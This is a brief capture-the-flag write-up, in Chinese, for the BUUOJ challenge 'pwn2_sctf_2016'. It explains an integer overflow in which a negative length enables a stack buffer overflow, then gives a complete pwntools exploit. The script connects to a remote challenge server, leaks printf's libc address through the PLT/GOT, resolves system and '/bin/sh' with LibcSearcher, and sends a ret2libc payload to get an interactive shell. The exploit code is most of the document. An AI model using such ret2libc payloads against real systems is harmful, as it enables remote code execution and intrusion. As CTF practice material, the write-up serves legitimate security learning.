pwn2_sctf_2016
Checksec:
Ida:
箭头处存在整数溢出漏洞,buff的长度是我们的输入控制的,我们直接输入一个负数就能得到可以溢出的buff大小。
然后程序中存在printf的plt地址,我们用他去泄露libc基址来绕过nx
Exp:
from pwn import *
from LibcSearcher import *
context(log_level='debug')
r = remote("node4.buuoj.cn",29425)
elf = ELF('./pwn2_sctf_2016')
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
main_addr = elf.sym['main']
r.recvuntil('How many bytes do you want me to read? ')
r.sendline('-1')
r.recvuntil('n')
payload=b'a'*(0x2c+4)+p32(printf_plt)+p32(main_addr)+p32(printf_got)
r.sendline(payload)
r.recvuntil('n')
printf_addr=u32(r.recv(4))
libc = LibcSearcher('printf', printf_addr)
libc_base = printf_addr - libc.dump('printf')
system_addr = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
r.sendlineafter('?', '-1')
r.recvuntil('data')
payload1 = b'a' * (0x2c + 4) + p32(system_addr) + p32(main_addr) + p32(binsh)
r.sendline(payload1)
r.interactive()
Flag:
